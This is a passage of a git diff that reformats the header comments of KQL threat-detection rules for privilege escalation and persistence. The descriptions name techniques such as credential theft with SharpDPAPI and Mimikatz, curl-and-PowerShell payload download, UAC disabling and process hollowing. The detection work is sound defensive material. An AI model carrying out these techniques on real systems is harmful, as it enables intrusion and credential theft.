executable to launch. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 diff --git a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql index 0cfdabf9..202b8146 100644 --- a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql +++ b/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql @@ -3,9 +3,8 @@ // Date: 2022-01-01 // Level: high // Description: Detects changes to the default RDP port. -Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. -Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). - +// Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. +// Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010 diff --git a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql index df8f7ea4..8dd598e6 100644 --- a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql @@ -3,8 +3,7 @@ // Date: 2025-07-01 // Level: high // Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing. -It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries. - +// It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012 diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql index d267a9ad..af05ec45 100644 --- a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql @@ -3,8 +3,7 @@ // Date: 2024-06-26 // Level: high // Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. -SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project. - +// SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 diff --git a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql index a757525a..ae3193f5 100644 --- a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql +++ b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql @@ -3,8 +3,7 @@ // Date: 2025-06-06 // Level: high // Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments. -Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability. - +// Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.t1068 diff --git a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql index d2986a52..db20864f 100644 --- a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql +++ b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql @@ -3,10 +3,9 @@ // Date: 2025-10-02 // Level: low // Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. -Attackers may use this technique to evade detection and execute commands in a modified environment. -This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. -While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts. - +// Attackers may use this technique to evade detection and execute commands in a modified environment. +// This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. +// While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.t1068 // False Positives: diff --git a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql index ce0452d8..c926c9a4 100644 --- a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql +++ b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql @@ -3,9 +3,8 @@ // Date: 2020-05-14 // Level: high // Description: Detects a network connection that is initiated by the "notepad.exe" process. -This might be a sign of process injection from a beacon process or something similar. -Notepad rarely initiates a network communication except when printing documents for example. - +// This might be a sign of process injection from a beacon process or something similar. +// Notepad rarely initiates a network communication except when printing documents for example. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055 // False Positives: diff --git a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql index 44b10093..ea14e885 100644 --- a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql +++ b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql @@ -3,8 +3,7 @@ // Date: 2021-12-29 // Level: medium // Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. -The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. - +// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 // False Positives: diff --git a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql index f761f8ed..337e8c14 100644 --- a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql +++ b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql @@ -3,7 +3,6 @@ // Date: 2023-11-28 // Level: high // Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 diff --git a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql index 99dd7739..a40c936b 100644 --- a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql +++ b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql @@ -3,7 +3,6 @@ // Date: 2025-07-30 // Level: medium // Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098 // False Positives: diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql index 43108576..1016a14b 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql @@ -3,8 +3,7 @@ // Date: 2022-08-29 // Level: medium // Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". -Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter - +// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql index 23a1da4f..be2ef769 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql @@ -3,10 +3,9 @@ // Date: 2022-08-10 // Level: high // Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence -The entries found under App Paths are used primarily for the following purposes. -First, to map an application's executable file name to that file's fully qualified path. -Second, to prepend information to the PATH environment variable on a per-application, per-process basis. - +// The entries found under App Paths are used primarily for the following purposes. +// First, to map an application's executable file name to that file's fully qualified path. +// Second, to prepend information to the PATH environment variable on a per-application, per-process basis. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012 // False Positives: diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql index 0127fdbd..4eaac851 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql @@ -3,9 +3,8 @@ // Date: 2024-01-01 // Level: medium // Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. -This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. -This can be potentially abused as a persistence mechanism. - +// This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. +// This can be potentially abused as a persistence mechanism. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 // False Positives: diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql index 23c7e4c2..ae1e326d 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql @@ -3,8 +3,7 @@ // Date: 2020-09-29 // Level: medium // Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. -In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. - +// In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql index 1b1339e5..6b86162a 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql @@ -3,7 +3,6 @@ // Date: 2019-10-25 // Level: medium // Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108 diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql index a3f64d2d..41364086 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql @@ -3,7 +3,6 @@ // Date: 2023-11-28 // Level: medium // Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 // False Positives: diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql index 4b9d4822..0f6cc0ae 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql @@ -3,8 +3,7 @@ // Date: 2021-12-30 // Level: medium // Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. -The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time - +// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 // False Positives: diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql index d80bf4f8..cc243a12 100644 --- a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql +++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql @@ -3,10 +3,9 @@ // Date: 2020-10-16 // Level: high // Description: Detects potential persistence behavior using the windows telemetry registry key. -Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. -This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. -The problem is, it will run any arbitrary command without restriction of location or type. - +// Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. +// This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. +// The problem is, it will run any arbitrary command without restriction of location or type. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 diff --git a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql index a84df41f..eee75d40 100644 --- a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql +++ b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql @@ -3,9 +3,8 @@ // Date: 2022-07-21 // Level: high // Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut. -If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. -Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. - +// If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. +// Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547 diff --git a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql index e0b0fdfa..eab7732d 100644 --- a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql @@ -3,10 +3,9 @@ // Date: 2021-10-24 // Level: high // Description: Detects PowerShell writing startup shortcuts. -This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. -Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. -In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" - +// This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. +// Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. +// In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 // False Positives: diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql index 8c557d30..66dfa068 100644 --- a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql +++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql @@ -3,8 +3,7 @@ // Date: 2025-02-05 // Level: medium // Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. -This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host. - +// This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 // False Positives: diff --git a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql index 15181baa..8aa8670e 100644 --- a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql +++ b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql @@ -3,8 +3,7 @@ // Date: 2020-10-06 // Level: low // Description: Detects the use of at/atd which are utilities that are used to schedule tasks. -They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code - +// They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002 // False Positives: diff --git a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql index e834eadf..705f8198 100644 --- a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql +++ b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql @@ -3,7 +3,6 @@ // Date: 2019-01-18 // Level: high // Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005 diff --git a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql index b81cd9e0..f6d0eeb2 100644 --- a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql +++ b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql @@ -3,9 +3,8 @@ // Date: 2024-12-01 // Level: medium // Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. -These ".lst" file can contain references to external program that "Setup16.EXE" will execute. -Attackers and adversaries might leverage this as a living of the land utility. - +// These ".lst" file can contain references to external program that "Setup16.EXE" will execute. +// Attackers and adversaries might leverage this as a living of the land utility. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005 // False Positives: diff --git a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql index 88a2255e..940fd4e4 100644 --- a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql +++ b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql @@ -3,7 +3,6 @@ // Date: 2025-02-17 // Level: high // Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047 // False Positives: diff --git a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql index 26d01298..9e65730c 100644 --- a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql +++ b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql @@ -3,9 +3,8 @@ // Date: 2022-04-23 // Level: high // Description: Get-Variable is a valid PowerShell cmdlet -WindowsApps is by default in the path where PowerShell is executed. -So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. - +// WindowsApps is by default in the path where PowerShell is executed. +// So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027 diff --git a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql index 1b1cc9ae..2e570eeb 100644 --- a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql +++ b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql @@ -3,9 +3,8 @@ // Date: 2022-07-28 // Level: high // Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location -Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on -Instead they modify the task after creation to include their malicious payload - +// Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on +// Instead they modify the task after creation to include their malicious payload // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 diff --git a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql index 17d1a303..549a2d51 100644 --- a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql +++ b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql @@ -3,8 +3,7 @@ // Date: 2021-12-29 // Level: medium // Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. -Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension - +// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002 diff --git a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql index c0cd8516..afbe4a05 100644 --- a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql +++ b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql @@ -3,9 +3,8 @@ // Date: 2022-08-10 // Level: high // Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. -These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. -This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems. - +// These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. +// This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001 // False Positives: diff --git a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql index 898abe2f..4303ff41 100644 --- a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql +++ b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql @@ -3,9 +3,8 @@ // Date: 2020-01-13 // Level: high // Description: The Tasks folder in system32 and syswow64 are globally writable paths. -Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application -in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr - +// Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application +// in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001 diff --git a/KQL/rules/Privilege Escalation/uac_disabled.kql b/KQL/rules/Privilege Escalation/uac_disabled.kql index 4e5c63ad..e9051e8b 100644 --- a/KQL/rules/Privilege Escalation/uac_disabled.kql +++ b/KQL/rules/Privilege Escalation/uac_disabled.kql @@ -3,7 +3,6 @@ // Date: 2022-01-05 // Level: medium // Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 diff --git a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql index d20cf544..b9ef9d72 100644 --- a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql +++ b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql @@ -3,9 +3,8 @@ // Date: 2024-05-10 // Level: medium // Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. -UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. -When "UACDisableNotify" is set to 1, UAC prompts are suppressed. - +// UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. +// When "UACDisableNotify" is set to 1, UAC prompts are suppressed. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 diff --git a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql index ab521f3a..b57657bf 100644 --- a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql +++ b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql @@ -3,9 +3,8 @@ // Date: 2024-05-10 // Level: medium // Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. -The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. -When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. - +// The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. +// When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 diff --git a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql index 1e929cb5..e55b9cc6 100644 --- a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql +++ b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql @@ -3,7 +3,6 @@ // Date: 2025-01-16 // Level: high // Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil". - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112 // False Positives: diff --git a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql index 4304fcd6..d06cabcd 100644 --- a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql +++ b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql @@ -3,8 +3,7 @@ // Date: 2021-12-30 // Level: high // Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. -Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - +// Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004 diff --git a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql b/KQL/rules/Privilege 